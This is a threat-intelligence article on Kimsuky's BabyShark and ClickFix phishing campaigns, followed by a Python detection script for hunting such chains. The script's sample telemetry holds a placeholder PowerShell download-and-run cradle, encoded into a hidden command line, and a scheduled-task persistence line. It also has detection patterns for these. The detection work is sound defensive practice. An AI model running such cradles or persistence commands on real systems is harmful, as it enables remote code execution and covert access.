BabyShark Attack Campaign
Cybersecurity researchers have uncovered continued and evolving attacks by the North Korean hacker group Kimsuky, who are using an elaborate social engineering tactic known as ClickFix to spread the BabyShark malware. These campaigns target national security experts and leverage both human deception and technical stealth to gain long-term access to victim systems.
Targeting Experts with Spear-Phishing Lures
The Kimsuky threat group has been sending spear-phishing emails since January 2025, initially focused on South Korean national security experts. The attackers masquerade as representatives of a legitimate German-language business publication and lure victims with fake interview requests. The emails carry links to malicious RAR archives which, once opened, drop a VBScript (.vbs) file. The script opens a decoy Google Docs document to appear legitimate while quietly running code that establishes persistence through scheduled tasks and collects system information.
Deceptive Personas and Modified ClickFix Variants
By March 2025, Kimsuky escalated its efforts by impersonating a high-ranking U.S. national security official. The new phishing emails featured a PDF with a list of fabricated meeting questions and tricked recipients into entering an 'authentication code' to access supposed secure content. This represents a shift in the ClickFix method, from fixing fake errors to entering codes, enhancing the illusion of legitimacy.
In April 2025, another variant emerged, this time impersonating a Japanese diplomat and referencing a proposed meeting with the Japanese ambassador to the U.S. The attack again used a decoy Google Docs page to mask the execution of an obfuscated PowerShell command, allowing continued data exfiltration and payload deployment via persistent C2 communication.
Weaponizing Fake Job Portals and Pop-Ups
In a more elaborate twist, Kimsuky began using fake websites impersonating defense research job portals. These sites displayed bogus job listings which, when clicked, triggered ClickFix-style pop-ups urging users to open the Windows Run dialog and execute a PowerShell command.
The command installed Chrome Remote Desktop, giving the attackers full remote access via SSH through the C2 domain kida.plusdocs.kro.kr. A misconfiguration on the attackers' own C2 server left stolen victim data exposed, believed to have originated from compromised South Korean systems. A China-based IP address linked to the same infrastructure also hosted a keylogger log and a Proton Drive ZIP archive that delivered BabyShark through a multi-stage chain.
Recent Innovations: Fake CAPTCHA and AutoIt Deployment
As recently as June 2025, Kimsuky began using fake Naver CAPTCHA verification pages. These pages instructed users to paste a PowerShell command into the Run dialog, which in turn ran an AutoIt script that harvested sensitive information. This further demonstrates the group's adaptive use of script-based tooling and social engineering to keep its foothold in victim environments.
Expanding Phishing Fronts: Academic Disguise and HWP Attacks
Beyond ClickFix, Kimsuky has also been linked to phishing campaigns disguised as academic correspondence. These emails appear to be requests to review a research paper and include a password-protected HWP document. Once opened, the malicious document leverages an embedded OLE object to run a PowerShell script. This script conducts detailed system reconnaissance and deploys AnyDesk, a legitimate remote desktop tool, to maintain persistent remote access.
Key Takeaways: Tactics and Techniques at a Glance
Kimsuky’s social engineering attacks rely on:
- Impersonation of trusted figures and institutions (journalists, diplomats, academics)
- Use of decoy files (Google Docs, PDFs, HWP documents) to mask malicious activity
- Manipulation of users into running PowerShell commands through fake errors, authentication prompts, or CAPTCHA pages
Technical hallmarks of the campaign include:
- Persistent access via scheduled tasks and remote access software (AnyDesk, Chrome Remote Desktop)
- Multi-stage delivery of BabyShark malware
- Use of script-based automation tools like AutoIt
- A misconfigured attacker-side C2 server that left stolen victim data exposed
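The hallmarks above translate into concrete hunting logic. The following is an added example (not code from the article or from any vendor report) that runs three checks over process-creation telemetry: a shell spawned from explorer.exe with the traits of a pasted ClickFix one-liner (the Run dialog launches commands as children of explorer.exe), schtasks.exe /create from a script host, and a remote-access tool install (AnyDesk, Chrome Remote Desktop) from a script host. It also decodes PowerShell -EncodedCommand payloads and scans the Run-dialog history key (RunMRU). The event schema, the marker strings for the remote tools, and all sample records are constructed for this example; the staging URL is a placeholder, not an indicator from the campaign.

```python
"""Hunt for ClickFix-style execution chains in process telemetry and RunMRU.

Added example, not from the original article. The ProcEvent schema and the
sample records below are constructed; field names mirror Sysmon Event ID 1 /
EDR process-creation events, but no product's schema is assumed.
"""
import base64
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str   # parent image basename, lower-case
    image: str    # child image basename, lower-case
    cmdline: str  # full command line of the child


# Hosts that ClickFix chains use to launch the next stage (VBS, PowerShell, AutoIt).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe",
                "pwsh.exe", "cmd.exe", "autoit3.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Traits of a pasted one-liner: hidden window, encoded payload, download cradle.
CLICKFIX_TRAITS = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-(?:e|ec|enc|encodedcommand)\s|"
    r"\biex\b|invoke-expression|downloadstring|\birm\b|invoke-restmethod|invoke-webrequest",
    re.I,
)
# Substrings identifying AnyDesk / Chrome Remote Desktop installers or binaries
# (assumed marker list for this example; extend for your environment).
REMOTE_TOOL_MARKERS = ("anydesk", "chromeremotedesktophost", "remoting_host")

ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline: str):
    """Return the -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(ev: ProcEvent):
    """Return the names of the rules the event trips (empty for benign events)."""
    hits = []
    cl = ev.cmdline.lower()
    # Rule 1: Win+R runs the typed command as a child of explorer.exe; a shell
    # spawned there with hidden/encoded/cradle traits is the ClickFix pattern.
    if ev.parent == "explorer.exe" and ev.image in SHELLS and CLICKFIX_TRAITS.search(ev.cmdline):
        hits.append("clickfix_run_dialog")
    # Rule 2: scheduled-task persistence created by a script host.
    if ev.image == "schtasks.exe" and "/create" in cl and ev.parent in SCRIPT_HOSTS:
        hits.append("schtasks_persistence_from_script")
    # Rule 3: remote-access tool installed by a script host.
    if ev.parent in SCRIPT_HOSTS and any(m in cl for m in REMOTE_TOOL_MARKERS):
        hits.append("remote_tool_install_from_script")
    return hits


def hunt(events):
    """List suspicious events with their rule hits and any decoded payload."""
    findings = []
    for ev in events:
        hits = classify(ev)
        if hits:
            findings.append({"event": ev, "rules": hits,
                             "decoded": decode_encoded_command(ev.cmdline)})
    return findings


def scan_runmru(values: dict):
    r"""Flag Run-dialog history entries carrying ClickFix traits.

    `values` is HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
    as a name->data mapping: Windows stores each typed command with a trailing
    '\1', and 'MRUList' holds the ordering.
    """
    flagged = []
    for name, data in values.items():
        if name == "MRUList":
            continue
        cmd = data[:-2] if data.endswith("\\1") else data
        if CLICKFIX_TRAITS.search(cmd):
            flagged.append(cmd)
    return flagged


# --- Constructed sample telemetry (not real victim data) ---
SAMPLE_PAYLOAD = "iex (irm https://example.invalid/stage1)"   # placeholder cradle
SAMPLE_ENCODED = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "powershell.exe", f"powershell.exe -w hidden -enc {SAMPLE_ENCODED}"),
    ProcEvent("wscript.exe", "schtasks.exe",
              "schtasks.exe /create /sc minute /mo 5 /tn Update /tr C:\\Users\\Public\\u.vbs"),
    ProcEvent("powershell.exe", "msiexec.exe",
              "msiexec.exe /i C:\\Users\\Public\\chromeremotedesktophost.msi /qn"),
    ProcEvent("explorer.exe", "powershell.exe", "powershell.exe"),               # interactive shell
    ProcEvent("services.exe", "schtasks.exe", "schtasks.exe /create /tn Backup /tr backup.exe"),
]

SAMPLE_RUNMRU = {
    "MRUList": "ba",
    "a": "notepad\\1",
    "b": f"powershell -w hidden -enc {SAMPLE_ENCODED}\\1",
}

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f["rules"], f["event"].cmdline[:60], f["decoded"])
    print(scan_runmru(SAMPLE_RUNMRU))
```

On the sample data the first three events trip one rule each and the two benign ones none; the decoded payload shows the cradle the user actually pasted, which is what an analyst needs when the PowerShell script-block log has already been cleared. The RunMRU scan is the forensic counterpart for hosts without process telemetry: the pasted command survives there after the shell has exited.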
Conclusion: A Constantly Evolving Threat
The BabyShark campaign illustrates Kimsuky’s agility in evolving their social engineering techniques and leveraging legitimate software and public infrastructure for malicious purposes. The ClickFix strategy highlights how threat actors continue to exploit human behavior as much as system vulnerabilities. Vigilance, layered defense strategies, and user education remain crucial to mitigating the risks posed by such sophisticated threat actors.